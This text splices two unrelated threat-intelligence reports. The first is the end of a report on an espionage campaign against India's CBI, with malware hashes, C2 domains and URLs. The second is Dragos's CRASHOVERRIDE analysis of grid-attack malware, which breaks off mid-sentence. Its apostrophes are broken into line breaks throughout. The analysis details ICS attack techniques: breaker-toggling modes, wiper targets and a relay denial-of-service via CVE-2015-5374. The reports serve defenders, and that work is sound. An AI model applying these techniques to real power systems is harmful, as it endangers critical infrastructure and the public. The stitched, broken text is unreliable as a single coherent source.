information (which can be faked) and the location of the IP address it is hard to say if the Pakistan espionage group
is involved in this attack, but based on the email theme, tactics used to impersonate Indian think tank (IDSA) and the
targets chosen that possibility is highly likely. Below screen shot shows the location of the hard coded IP address.
Indicators Of Compromise (IOC)
In this campaign the cyber espionage group targeted Central Bureau of Investigation (CBI) but it is possible that
other government entities could also be targeted as part of this attack campaign. The indicators associated with this
attack are provided so that the organizations (Government, Public, Private organizations and Defense sectors) can
use these indicators to detect, remediate and investigate this attack campaign. Below are the indicators
Dropped Malware Sample:
f8daa49c489f606c87d39a88ab76a1ba
Related Malware Samples:
15588a9ba1c0abefd38ac2594ee5be53
04b4b036a48dc2d2022cc7704f85a560
becc8e77ef003a4c88f7e6348ffd3609
ceeeacbaf38792bcf06022e2b4874782
515dce0ede42052ff3ef664db9873cea
50c1d394bfa187ffd6251df6dd14e939
3bd16cc1d1fea7190c36b3bd10c6810d
b6c861556412a15b7979459176b7d82f
Network Indicators Associated with C2:
qhavcloud[.]com
173[.]212[.]194[.]214
173[.]212[.]193[.]53
91[.]205[.]173[.]3
180[.]92[.]154[.]176
Domains Impersonating the Identity of Indian Think Tank (IDSA):
32/33
idsadesk[.]in
idsagroup[.]in
Email Indicator:
iasia69@z7az14m[.]com
C2 Communication Patterns:
hxxp://qhavcloud[.]com//northernlights//PingPong.php
hxxp://qhavcloud[.]com//northernlights//postdata.php
hxxp://qhavcloud[.]com//northernlights//JobProcesses.php
hxxp://qhavcloud[.]com//northernlights//JobWork1.php
hxxp://qhavcloud[.]com//northernlights//JobWork2.php
hxxp://qhavcloud[.]com//northernlights//JobTCP1.php
hxxp://qhavcloud[.]com//northernlights//JobTCP2.php
hxxp://qhavcloud[.]com//northernlights//updateproductdownload.php
hxxp://qhavcloud[.]com//northernlights//Uninstaller.php
Conclusion
Attackers in this case made every attempt to launch a clever attack campaign by impersonating the identity of highly
influential Indian Think tank to target Indian investigative agency and the officials of the Indian army by using an
email theme relevant to the targets. The following factors in this cyber attack suggests the possible involvement of
Pakistan state sponsored cyber espionage group to spy or to take control of the systems of the officials of Central
Bureau of Investigation (CBI) and officials of the Indian Army.
Use of domain impersonating the identity of highly influential Indian think tank
Victims/targets chosen (CBI and Army officials)
Use of Email theme that is of interest to the targets
Location of one of the hard coded IP address in the binary
Use of TTP
s (tactics, techniques & procedures) similar to the previous campaigns targeting Indian Ministry of
External Affairs and Indian Navy
s Warship Manufacturer.
Use of the same C2 infrastructure that was used to target senior army officers
The attackers in this case used multiple techniques to avoid detection and to frustrate analysts. The following factors
reveal the attackers intention to remain stealthy and to gain long-term access by evading analysis and security
monitoring at both the desktop and network levels.
Use of password protected macro to prevent viewing the code and to make manual analysis harder
Use of TextBox within the UserForm to store malicious content to bypass analysis tools
Use of legitimate service like Google drive to store the list of back up C2 servers to bypass security
monitoring and reputation based devices.
Use of malware that performs various checks before performing any malicious activity
Use of backup C2 servers and hosting sites to keep the operation up and running
Use of hosting provider to host C2 infrastructure
33/33
CRASHOVERRIDE
Analysis of the Threat
to Electric Grid Operations
DRAGOS INC. / WWW.DRAGOS.COM
version 2.20170613
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
CRASHOVERRIDE
Analyzing the Threat to
Electric Grid Operations
Contents
Executive Summary
Why Are We Publishing This
Key Takeaways
Background
Introduction to Electric Grid Operations
Evolution of Tradecraft
STUXNET
Dragonfly/HAVEX
BLACKENERGY 2
Ukraine Cyber Attack 2015
CRASHOVERRIDE
Capabilities
Capabilities Overview
Module Commonalities
Backdoor/RAT Module
Launcher Module
Data Wiper Module
IEC 104 Module
IEC 101 Module
61850 Module
OPC DA Module
SIPROTECT DoS Module
Capability Conclusions
Implications of capability
Attack Option: De-energize substation
Attack Option: Force an Islanding event
Adding Amplification Attacks
Using OPC to create a Denial of Visibility
Using CVE-2015-5374 to hamper protective relays
Defense Recommendations
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Executive Summary
Dragos, Inc. was notified by the Slovak anti-virus firm ESET of an ICS tailored malware on June 8th, 2017. The Dragos team was able to use this notification to find
samples of the malware, identify new functionality and impact scenarios, and confirm that this was the malware employed in the December 17th, 2016 cyber-attack
on the Kiev, Ukraine transmission substation which resulted in electric grid operations impact. This report serves as an industry report to inform the electric sector
and security community of the potential implications of this malware and the appropriate details to have a nuanced discussion.
Why Are We Publishing This
Security firms must always balance a need to inform the public against empowering
adversaries with feedback on how they are being detected and analyzed. This case is
no different. In fact, it is more important given that there is no simple fix as the capability described in this report takes advantage of the knowledge of electric grid systems. It is not an aspect of technical vulnerability and exploitation. It cannot just be
patched or architected away although the electric grid is entirely defensible. Human
defenders leveraging an active defense such as hunting and responding internally to
the industrial control system (ICS) networks can ensure that security is maintained.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Key Takeaways
The malware self-identifies as
crash
in multiple locations thus leading to the
naming convention
CRASHOVERRIDE
for the malware framework.
CRASHOVERRIDE is the first ever malware framework designed and deployed to
attack electric grids.
CRASHOVERRIDE is the fourth ever piece of ICS-tailored malware (STUXNET,
BLACKENERGY 2, and HAVEX were the first three) used against targets and the
second ever to be designed and deployed for disrupting physical industrial processes (STUXNET was the first).
CRASHOVERRIDE is not unique to any particular vendor or configuration and
instead leverages knowledge of grid operations and network communications
to cause impact; in that way, it can be immediately re-purposed in Europe and
portions of the Middle East and Asia.
CRASHOVERRIDE is extensible and with a small amount of tailoring such as the
inclusion of a DNP3 protocol stack would also be effective in the North American grid.
CRASHOVERRIDE could be leveraged at multiple sites simultaneously, but the
scenario is not cataclysmic and would result in hours, potentially a few days, of
outages, not weeks or more.
Dragos assesses with high confidence that the same malware was used in the
cyber-attack to de-energize a transmission substation on December 17, 2016,
resulting in outages for an unspecified number of customers.
The functionality in the CRASHOVERRIDE framework serves no espionage purpose and the only real feature of the malware is for attacks which would lead to
electric outages.
CRASHOVERRIDE could be extended to other industries with additional protocol modules, but the adversaries have not demonstrated the knowledge of
other physical industrial processes to be able to make that assessment anything
other than a hypothetical at this point and protocol changes alone would be
insufficient.
Dragos, Inc. tracks the adversary group behind CRASHOVERRIDE as ELECTRUM
and assesses with high confidence through confidential sources that ELECTRUM
has direct ties to the Sandworm team. Our intelligence ICS WorldView customers have received a comprehensive report and this industry report will not
get into sensitive technical details but instead focus on information needed for
defense and impact awareness.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Background
On June 8th, 2017 the Slovak anti-virus firm ESET shared a subset of digital hashes of the malware described below and a portion of their analysis with Dragos.
The Dragos team was asked to validate ESET
s findings to news publications ESET
had contacted about the story which would be published June 12th, 2017. Dragos
would like to thank ESET for sharing the digital hashes which allowed the Dragos
team to spawn its investigation. Without control of the timeline, it was Dragos
desire to publish a report alongside ESET
s report to capture the nuance of electric grid operations. The report also contains new discoveries, indicators, and implications of the tradecraft. Also, because of the connection to the activity group
Dragos tracks as ELECTRUM, it was our decision that an independent report was
warranted. The Dragos team has been busy over the last 96 hours reproducing and
verifying ESET
s analysis, hunting for new samples of the malware and potential additional infections, notifying appropriate companies, and informing our customers.
Importantly, Dragos also updated ICS vendors that needed to be made aware of
this capability, relevant government agencies, many national computer emergency response teams (CERTs), and key players in the electric energy community. Our
many thanks to those involved.
If you are a Dragos, Inc. customer, you will have already received the more concise
and technically in-depth intelligence report. It will be accompanied by follow-on
reports, and the Dragos team will keep you up-to-date as things evolve. It is in
Dragos
view that the following report contains significant assessments that deserve a wide audience in the electric sector. Avoiding hype and fear should always
be paramount but this case-study is of immediate significance, and this is not a
singular contained event. The CRASHOVERRIDE capability is purpose built to impact electric grid operations and has been created as a framework to facilitate the
impact of electric grids in other countries in the future outside the attack that took
place with it December 17th, 2016 in Ukraine. However, as always, the defense is
doable.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Introduction to Electric Grid Operations
As with most ICS specific incidents, the most interesting components of the attack
are in how the adversary has demonstrated they understand the physical industrial process. Whereas vulnerabilities, exploits, and infection vectors can drive discussions in intrusion analysis of IT security threats that is not the most important
aspect of an ICS attack. To fully understand the CRASHOVERRIDE framework, its
individual capabilities, and overall impact on ICS security it is important to understand certain fundamentals of electric grid operations.
Simplistically, the electric grid can be categorized into three functions: generation
of electricity at power plants, transmission from the power plants across typically
long distances at high voltage, and then stepped down to lower voltage to distribution networks to power customers. Along these long transmission and distribution
systems are substations to transform voltage levels, serve as switching stations and
feeders, and fault protection.
Many industries feed into the electric grid, and those differences require different
systems and communications. As an example, while a power plant feeds energy
into the electric grid there is no one-size-fits-all approach to power plants. There
are power plants that cover different sources of fuel including coal-fired, nuclear
generation, wind farm, solar farm, gas turbine power, hydroelectric and more. This
means that the electric grid must be a robust, almost living creature, which moves
and balances electricity across large regions. Electric grids use a special type of
industrial control system called a supervisory control and data acquisition (SCADA)
system to manage this process across large geographical areas. Transmission and
distribution owners have their substations in their particular geographical footprint
and control centers manage the cross-territory SCADA systems 24/7 by human operators. These control centers often regularly manage the continual demand and
response of their customers, respond to faults, and plan and work with neighboring
utilities.
This simplistic view of grid operations is similar around the world. There are often vendor and network protocol differences between countries but the electrical
engineering, and the overall process is largely the same between nations. As an
example, these systems use SCADA and leverage systems such as remote terminal
units (RTUs) to control circuit breakers. As the breakers open and close, substations
are energized or de-energized to balance power across the grid. Some network
protocols such as IEC 104, a TCP-based protocol, and its serial protocol companion IEC 101, are often regional specific. Europe, some of Asian, and portions of
the Middle East leverage these protocols to control RTUs from the SCADA human
machine interfaces (HMIs).
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Figure 1: Simplistic Mockup of Electric Grid Operations Systems and Communications Relevant for CRASHOVERRIDE
In North America, the protocol of choice for this is the Distributed Network Protocol 3 (DNP3). The various protocols purposes are largely the same though: control
physical equipment through RTUs, programmable logic controllers (PLCs), and
other final control elements via HMIs as a part of the larger SCADA system. Some
protocols have been adopted cross-country including IEC 61850 which is usually leveraged from an HMI to work with equipment such as digital relays and other
types of intelligent electronic devices (IEDs). IEDs are purpose built microprocessor-based control devices and can often be found alongside power equipment
such as circuit breakers. IEDs and RTUs operate in a master/slave capacity where
the slave devices are polled and sent commands by master devices.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Substations manage the flow of power through transmission or distribution lines.
Management of energizing and de-energizing of these lines ultimately control
when and where the flow of power moves in and out of the substation. If you
open
a breaker you are removing the path where the electricity is flowing, or
de-energizing it. If you
close
a breaker then you are energizing the line by closing
the gap and allowing the power to
flow.
This concept is similar to anyone who
has tripped (opened) a breaker in their house. Traditional
or
IT security
staff
may be confused on this terminology as it is opposite to how one would describe
firewall rules where
open
means network traffic may flow and
closed
means
network traffic is prohibited.
The grid is a well-designed system, and while damage can be done, it is vital to understand that in nations around the world the electric community has designed the
system to be reliable and safe which has a natural byproduct of increased security. In the United States as an example, reliability is reinforced with regular training
and events such as the North American grid
s GridEx where grid operators train for
events from hurricanes, to terrorist incidents, to cyber-attacks and how they will
respond to such outages. There is constantly a balance that must be understood
when referring to grid operations: yes, the systems are vulnerable and more must
be done to understand complex and multi-stage attacks, but the grid is also in a
great defensible position because of the work of so many over the years.
Evolution of Tradecraft
CRASHOVERRIDE represents an evolution in tradecraft and capabilities by adversaries who wish to do harm to industrial environments. To fully appreciate the
malware it is valuable to compare it to its predecessors and the Ukraine 2015 cyber
attack.
STUXNET
The STUXNET malware has been written about extensively and referenced, at
times, unfortunately, in comparison to most ICS related incidents and malware. It
was the first confirmed example of ICS tailored malware leveraged against a target. The Windows portion of the code with its four zero-day exploits gained a lot
of notoriety. However, it was the malware
s payload that was specific to ICS that
was the most interesting component. The tradecraft exhibited by STUXNET was
the detailed understanding of the industrial process. In IT networks, it is important
for adversaries to identify vulnerabilities and exploit them to load malware and gain
privileges on systems.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
In ICS networks though, some of the most concerning issues are related to an
adversary
s ability to learn the physical process such as the engineering of the
systems and their components in how they work together. STUXNET
s greatest
strength was leveraging functionality in Siemens equipment to interact with nuclear enrichment centrifuges through abuses of intended functionality. The purpose
of the Siemens equipment was to be able to control and change the speed of the
centrifuges. Stuxnet did this as well but with pre-programmed knowledge from the
attackers on the speeds that would cause the centrifuge to burst from their casings. ICS tailored malware leveraging knowledge of industrial processes was now a
thing. However, it was specific to Siemens equipment and unique to the Natanz facility in Iran. While tradecraft and exploits can be replicated, it was not reasonable
to re-purpose the Stuxnet capability.
Dragonfly/HAVEX
The Dragonfly campaign was an espionage effort that targeted numerous industrial
control system locations, estimates put it at over 2,000 sites, with a large emphasis on electric power and petrochemical asset owners. The Dragonfly campaign
leveraged the HAVEX malware. There are often not many commonalities between
different industrial sites. Even a single substation in one company can be almost
entirely different than a substation in the same company based on vendors, implementation, integration, and the physical processes required at each site. One of the
few commonalities across numerous ICS industries though is the OPC protocol.
It is designed to be the universal translator for many industrial components and is
readily accessible in an HMI or dedicated OPC server. The HAVEX malware leveraged legitimate functionality in the OPC protocol to map out the industrial equipment and devices on an ICS network. It was a clever use of the protocol and while
the malware itself was not complex the tradecraft associated with the usage of
OPC was sophisticated. However, the Dragonfly campaign was focused entirely on
espionage. There was no physical disruption or destruction of the industrial process. Instead, it was the type of data you would want to leverage to design attacks
in the future built for the specific targets impacted with the malware.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
BLACKENERGY 2
The Sandworm team has targeted numerous industries ranging from western militaries, governments, research organizations, defense contractors, and industrial
sites. It was their use of the BLACKENERGY 2 malware that caught the ICS industry
s attention. This ICS tailored malware contained exploits for specific types of
HMI applications including Siemens SIMATIC, GE CIMPLICITY, and Advantech WebAccess. BLACKENERGY 2 was a smart approach by the adversaries to target internet connected HMIs. Upon exploitation of the HMIs, the adversaries had access
to a central location in the ICS to start to learn the industrial process and gain the
graphical representation of that ICS through the HMI. The targeting of HMIs alone
is often not enough to cause physical damage, but it is an ideal target for espionage and positioning in an ICS. Gaining a foothold in the network that had access
to numerous components of the ICS while maintaining command and control to
Internet locations, positioned it well for espionage.
Ukraine Cyber Attack 2015
The cyber-attack on three power companies in Ukraine on December 23rd, 2015
marked a revolutionary event for electric grid operators. It was the first known instance where a cyber-attack had disrupted electric grid operations. The Sandworm
team was attributed to the attack and their use of the BLACKENERGY 3 malware.
BLACKENERGY 3 does not contain ICS components in the way that BLACKENERGY 2 did. Instead, the adversaries leveraged the BLACKENERGY 3 malware to gain
access to the corporate networks of the power companies and then pivot into the
SCADA networks. While in the environment the adversaries performed their reconnaissance and eventually leveraged the grids systems against itself. They learned
the operations and used the legitimate functionality of distribution management
systems to disconnect substations from the grid leaving 225,000+ customers
without power for upwards of 6 hours until manual operations could restore power. However, due to the wiping of Windows systems through the KillDisk malware
and destruction of serial-to-Ethernet devices through malicious firmware updates,
the Ukrainian grid operators were without their SCADA environment, meaning they
lost the ability for automated control, for upwards of a year in some locations. The
most notable aspect of the attack was the adversary
s focus on learning how to
leverage the systems against themselves. Malware enabled the attack, and malware
delayed restoration efforts, but it was the direct interaction of the adversary leveraging the ICS against itself that resulted in the electric power disruptions, not malware.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
CRASHOVERRIDE
The CRASHOVERRIDE malware impacted a single transmission level substation
in Ukraine on December 17th, 2016. Many elements of the attack appear to have
been more of a proof of concept than what was fully capable in the malware. The
most important thing to understand though from the evolution of tradecraft is the
codification and scalability in the malware towards what has been learned through
past attacks. The malware took an approach to understand and codify the knowledge of the industrial process to disrupt operations as STUXNET did. It leveraged
the OPC protocol to help it map the environment and select its targets similar to
HAVEX. It targeted the libraries and configuration files of HMIs to understand the
environment further and leveraged HMIs to connect to Internet-connected locations when possible as BLACKENERGY 2 had done. And it took the same type
of approach to understanding grid operations and leveraging the systems against
themselves displayed in Ukraine 2015
s attack. It did all of these things with added
sophistication in each category giving the adversaries a platform to conduct attacks against grid operations systems in various environments and not confined to
work only on specific vendor platforms. It marks an advancement in capability by
adversaries who intend to disrupt operations and poses a challenge for defenders
who look to patching systems as a primary defense, using anti-malware tools to
spot specific samples, and relying upon a strong perimeter or air-gapped network
as a silver-bullet solution. Adversaries are getting smarter, they are growing in their
ability to learn industrial processes and codify and scale that knowledge, and defenders must also adapt.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Capabilities
Capabilities Overview
The CRASHOVERRIDE malware is a modular framework consisting of an initial
backdoor, a loader module, and several supporting and payload modules.
The most important items are the backdoor, which provides access to the infected
system, the loader module, which enables effects on the target, and the individual
payload modules. Dragos focused our analysis on the previously mentioned items
as they are most relevant for defending grid operations.
Dragos analysts were able to obtain two samples of the malware related to effects
on the targeted industrial control system. One sample was the IEC 104 protocol
module, and the other sample was the data wiper. Both samples shared common
design characteristics indicative of being part of a broader ICS attack and manipulation framework. ESET was able to uncover an additional IEC 61850 and OPC
module which they have analyzed and shared with Dragos.
Below contains an overview of program execution flow and dependency.
Figure 2. CRASHOVERRIDE Module Overview Including ESET
s Discoveries
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Module Commonalities
Dragos analysts were able to determine the compile time for both modules obtained as being within 12 minutes of each other just after 2:30 am on December
18th in an unknown time zone although timestamps for both samples were zeroed
out. These times falls in the same timeframe as the Ukraine events. Both module samples exported a function named Crash that served as the main function to
begin execution. The common Crash function enables the ability to
plug and play
additional modules.
Backdoor/RAT Module
Key Features
Authenticates with a local proxy via the internal network established before the
backdoor installation
After authentication opens HTTP channel to external command and control
server (C2) through internal proxy
Receives commands via the external command and control (C2) server
Creates a file on the local system (contents not determined)
Overwrites an existing service to point to the backdoor so the malware persists
between reboots
Details
Access to the ICS network flows through a backdoor module. Dragos obtained
four samples which all featured similar functionality. On execution, the malware
attempts to contact a hard-coded proxy address located within the local network.
ELECTRUM must establish the internal proxy before the installation of the backdoor.
The malware expects to communicate to an internal proxy listening on TCP 3128.
This port is a default port associated with the Squid proxy. The beaconing continues without pause until it establishes a connection. The backdoor then sends a series of HTTP POST requests with the victim
s Windows GUID (a unique identifier set
with every Windows installation) in the HTTP body. This information authenticates
the targeted machine to the command and control (C2) server. If the C2 server
does not respond, the backdoor will exit.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
If the authentication is successful to the internal proxy, the malware attempts to perform an HTTP CONNECT to an external C2 server via the internal proxy. Across four
samples, Dragos identified three different C2 addresses which were likely part of the
December 2016 attack on Ukraine:
195.16.88.6
93.115.27.57
5.39.218.152
A check of the TOR project
s ExoneraTOR service indicates that all of the listed IP addresses were listed as active TOR nodes during the events in Ukraine.
When performing the HTTP CONNECT, the malware attempts to identify the system
default user agent. If this cannot be determined or does not exist, then a hard-coded
default for the malware is used:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
The malware can be configured to beacon out periodically afterwards via a hard-coded
configuration value. The implant is designed to retrieve commands from the C2 server:
Create a new process as logged in user
Create a new process as specified user via CreateProcessWithLogon
Write a file
Copy a file
Execute a command as logged in user
Execute a command as specified user
Kill the backdoor
Stop a service
Specify a user (log in as user) and stop a service
Specify a user (log in as user) and start a service
Alter an existing service to point to specified process and change to start at boot
Execution results in several artifacts left on the host. During execution, the malware
checks for the presence of a mutex value. Mutexes are program objects that name resources to enable sharing with multiple program threads. In this case, CRASHOVERRIDE
checks the following:
\Sessions\1\Windows\ApiPortection
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
The backdoor may also create and check a blank mutex name. Reviewing memory during execution and analysis of other modules in the malware indicates that \
Sessions\1\Windows\ appears multiple times, indicating that a check may be performed.
The backdoor writes a file to either C:\Users\Public\ or C:\Users\
The contents of this file were not discovered during our analysis, and it did not
appear to be vital to the malware functionality. However, this is a good indicator of
the observed activity and may be leveraged to detect this specific sample through
host-based indicator checking.
The service manipulation process is the only persistence mechanism for the malware. When used, the adversary can select an arbitrary system service, direct it to
refer to CRASHOVERRIDE, and ensure it is loaded on system boot. If this fails, the
malware, although present on disk, will not start when the machine reboots.
When evaluating the options provided to the adversary, an important piece of
functionality associated with most remote access tools is absent: a command to
exfiltrate data. While this functionality could be created via the command execution options, one would expect this option to be explicit given options to download and copy files on the host if the adversary intended to use the tool as an
all-encompassing backdoor and espionage framework. Instead, the functionality
of this tool is explicitly designed for facilitating access to the machine and executing commands on the system and cannot reasonably be confused as an espionage
platform, data stealer, or another such item.
Launcher Module
Key Features
Loads payload modules which manipulate the ICS and cause destruction via
the wiper
Starts itself as a service likely to hide better
Loads the payload module(s) defined on the command line during execution
Launches the payload and begins either 1 or 2 hours countdown before
launching the data wiper (variant dependent)
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Details
Within the attack sequence, the ICS payload modules and data wiper module must be
loaded by a separate loader EXE. Dragos obtained one sample of this file called the
Launcher.
The launcher takes three parameters on start:
Launcher.exe payload.dll configuration.ini
On launch, the sample analyzed starts a service named defragsvc. It then loads the
module DLL via an exported function named Crash. A new thread is created at the
highest priority on the executing machine. Control then passes from the launcher to
the loaded module while the launcher waits two hours before executing the data wiper.
Data Wiper Module
Key Features
Clears all registry keys associated with system services
Overwrites all ICS configuration files across the hard drives and all mapped network drives specifically targeting ABB PCM600 configuration files in this sample
Overwrites generic Windows files
Renders the system unusable
Details
Once executed, the data wiper module clears registry keys, erase files, and kill processes running on the system. A unique characteristic of the wiper is that the main
functionality was implemented within the Crash function.
The first task of the wiper writes zeros into all of the registry keys in:
SYSTEM\CurrentControlSet\Services
This registry tree contains initialization values for each service on the system. Removal
of these values renders a system inoperable. The next wiper task targets ICS configuration files across the local hard drive and mapped network drives. The malware authors included functionality to target drives lettered C-Z.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
The wiper also targets file types unique to ABB
s PCM600 product used in substation automation in addition to more general Windows files. The below table outlines some of the unique file extensions used by industrial control systems.
File Extension
.pcmp
.pcmi
.pcmt
.CIN
.paf
.SCL
.cid
.scd
Usage
PCM600 Project (ABB)
PCM600 IEC File (ABB)
PCM600 Template IED File
ABB MicroScada
Programmable Logic File
PLC Archive File
Substation Configuration Language
Configured IED Description
Substation Configuration Description
Table 1. File extensions targeted by the data wiper module
IEC 104 Module
Key Features
Reads a configuration file defining the target (likely an RTU) and action to
take
Kills
legitimate the master process on the victim host
Masquerades as the new master
Enters one of four modes:
Sequence mode: continuously sets RTU IOAs to open
Range mode: (1) Interrogates each RTU for valid IOAs; (2) toggles each
IOA between open and closed state
Shift mode: unknown at this time
Persist mode: unknown at this time/not fully implemented
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Figure 3. Protocol Transmission Types in IEC 104
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Figure 4: Execution Flow of IEC 104 Module in CRASHOVERRIDE
Details
The CRASHOVERRIDE IEC 104 module is a complete implementation of IEC 104 to
serve in a
MASTER
role. This raw functionality creates a Swiss army knife for substation automation manipulation yet also provides tailored functionality. The functions exposed to the malware operator are confined by the options of the configuration file. This report outlines the options analyzed today but notes that extending
and enhancing functionality is straight forward with the robust protocol implementation.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
The design of the IEC 104 module differs from the wiper and suggests that a secondary group of developers could have been involved. Instead of the exported
crash function containing the primary execution instructions, the function parses
the config file then starts a thread containing the IEC 104 master. The configuration
file can have multiple entries offset by [STATION], followed by 13 values:
File Extension
target_ip
target_port
logfile
adsu
stop_comm_service
change
first_action
silence
uselog
stop_comm_service_name
timeout
socket_timeout
range
Usage
NONE
NONE
NONE
NONE
1 second
15 seconds
NONE
Table 2. IEC-104 module configuration file fields
The configuration file is critical to achieving an effect on the target, as target specifications for the device must be provided by the operator in the configuration file
for the module to function. There are no observed automated means of enumerating the network and then impacting RTUs.
Each [STATION]entry spawns a thread for follow-on effects against ICS equipment.
Once the IEC 104 master thread begins, the first action is to try to kill the communications service process which acts as the master process. Once the module stops
the communications service process, a socket opens with the target IP and destination port sending data to slave devices and receiving the resulting responses.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Depending on the mode defined within the configuration file the module may:
Set specific values
Enumerate IOAs on the target devices
Continuously set the IOA to open, or
Continuously toggle the IOA between open and closed states.
This module contains no interactive capability.
RTUs and PLCs, in simplistic terms, act on input and output. Each discrete input
and output is tied to a memory address. Depending on implementation these addresses are referred to as coils, registers, or for IEC 104: information object addresses (IOAs). IOAs are typed and can hold different value types, such as Boolean
or Unsigned Integer values. The 104 module properly understands how to enumerate and discover IOAs to operate breakers.
IEC 101 Module
This module was unavailable to Dragos at the time of publication. ESET
s analysis
claims the functionality is equivalent to the IEC 104 module except with communications over serial. However, Dragos was able to confirm that the module exists.
IEC 61850 Module
This module was unavailable to Dragos at the time of publication. ESET
s analysis
claims once executed the module leverages a configuration file to identify targets
and without a configuration file it enumerates the local network to identify potential targets. It communicates with the targets to identify whether the device controls a circuit breaker switch. For certain variables (no further information available) it will change their state while also generating an action log. However, Dragos
was able to confirm that this module does exist.
OPC DA Module
This module was unavailable to Dragos at the time of publication. ESET
s analysis
claims the module does not require a configuration. It enumerates all OPC servers
and their associated items looking for a subset related to ABB containing the string
ctl. It then writes 0x01 twice into the item overwriting the proper value giving the
device a primary value out of limits device status. However, Dragos was able to
confirm that this module exists.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
SIPROTEC DoS Module
This module was unavailable to Dragos at the time of publication. ESET
s analysis
claims the module sends UDP packets to port 50000 exploiting CVE-2015-5374
causing the SIPROTEC digital relay to fall into an unresponsive state. Dragos could
not validate that this module exists.
Capability Conclusions
ELECTRUM
s ability to adopt a development style described above has several implications: first, developers can integrate new protocols into the overall framework
quickly. Second, ELECTRUM could easily leverage external development teams
skilled at exploiting industrial control systems. Some adversaries would likely approach capability development through a
two-tier
approach: a core development
team skilled at writing the overall framework and a second team knowledgeable
about a given control system. The platform team would take the control system modules and add logic to fit them within the platform. The IEC 104 module
demonstrates this approach.
Given the execution described with secondary threads the team authoring the
Crash function likely did not author the IEC 104 master portion of the code. Both
development teams probably worked together to decide on a log file format for
consumption by the main Crash function and executed in each of the IEC 104
module threads.
Implications of capability
This section describes legitimate CRASHOVERRIDE attack and impact scenarios.
Extensions of these and potential hypothetical scenarios were deemed indeterministic and will not be addressed.
Attack Option: De-energize substation
CRASHOVERRIDE, based on prior knowledge, must have a configuration file for
targeting information of one or multiple RTUs. This configuration option allows for
several types of activities. One operation the configuration option allows is
sequence.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
The command sequence polls the target device for the appropriate addresses. Once it is at the subset of known addresses, it can then toggle the value. The
command then begins an infinite loop and continues to set addresses to this value effectively opening closed breakers. If a system operator tries to issue a close
command on their HMI the sequence loop will continue to re-open the breaker.
This loop maintaining open breakers will effectively de-energize the substation
line(s) preventing system operators from managing the breakers and re-energize
the line(s).
The effects of de-energizing a line or substation largely depends on the system
dynamics, power flows, and other variables. In some circumstances, it may have no
immediate impact while in others it could put customers into an outage. It is important to note that grid operations encompass failure modes and operations can
normally compensate. That is, after all, why humans are
in the loop
to monitor
and maintain the system.
From a recovery standpoint, the remote staff will effectively have lost control of the
breakers and will be required to send crews to the substation. If the CRASHOVERRIDE loop continues unabated, then the crews will likely sever communications as
both a troubleshooting and recovery action. Severing communications puts the
substation in manual operation where a physical presence is now required. This
could result in a few hours of outages
Attack Option: Force an Islanding event
Dragos is currently investigating a separate and more disruptive attack option in
CRASHOVERRIDE as described by ESET. As before, the attacker must have a configuration file for targeting information of one or multiple RTUs. This configuration file
now uses the range command to begin a loop that toggles the status of the breaker between open and close continuously. The changing breaker status will invoke
automated protective operations to isolate (commonly referred to as
islanding
the substation. This is an intentional self-protective capability of grid operations.
In effect, this breaker strobing takes the substation offline due to the protective
relay scheme
s automated operations causing perturbations of some degree on the
grid as scientific principles define how the behavior interacts with frequencies and
phases. The variables of these effects will dictate impacts but could cause system
instabilities depending on the effectiveness of the protection relays and their operations. Grid operation contingencies become more critical if multiple substations
were under attack likely resulting in many small islanding events. This is assuming
coordinated targeting of multiple electric sites and could result in a few days of
outages.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Adding Amplification Attacks
Forcing an islanding of a substation through continual breaker manipulation is significant by itself. However, CRASHOVERRIDE has the potential to amplify this attack
even more. Two separate CRASHOVERRIDE modules offer this opportunity.
Using OPC to create a Denial of Visibility
The OPC module ESET analysis suggests it can brute force values. Module OPC.
exe will send out a 0x01 status which for the target systems equates to a
Primary
Variable Out of Limits
misdirecting operators from understanding protective relay
status.
Bit Mask
0x10
0x08
0x04
0x02
0x01
Definition
More Status Available
More status information is available via
Command 48, Read Additional Status Information.
Loop Current Fixed
The Loop Current is being held at a fixed
value and is not responding to process variations.
Loop Current Saturated
The Loop Current has reached its
upper (or lower) endpoint limit and cannot increase (or decrease)
any further.
Non-Primary Variable Out of Limits
A Device variable not
mapped to the PV is beyond its operating limits.
Primary Variable Out of Limits
The PV is beyond its operating
limits.
The outcome of the action infers that various systems can either perform actions
on wrong information or report incorrect information to system operators. This
Denial of Visibility will amplify misunderstanding and confusion while system operators troubleshoot the problem as their system view will show breakers closed
when they are open.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Using CVE-2015-5374 to Hamper Protective Relays
A second, and more severe, amplifying attack would be to neutralize the automated protective system by creating a Denial of Service against some or all of the
protective relays. This possibility exists in a tool ESET has claimed to have discovered that implements the known CVE-2015-5374 Denial of Service condition to the
Siemens SIPROTEC relays. Siemens released a patch for this in July 2015 under Siemens advisory SCA-732541. At this time it is believed that CVE-2015-5374 causes a
denial of service (DoS) of the complete relay functionality and not just the network
communications module. Dragos has independent evidence that this module exists but it cannot be confirmed.
Hampering the protective scheme by disabling the protective relays can broaden
the islanding event and, if done at scale, could trigger a larger event causing multiple substations and lines
islanding
from the electric grid. Siemens SIPROTEC was
likely chosen in this attack only because that was the vendor device at the Ukraine
Kiev site attacked in December 2016. This same tactic against digital relays, albeit not the same exploit, could have a similar impact on grid operations. However,
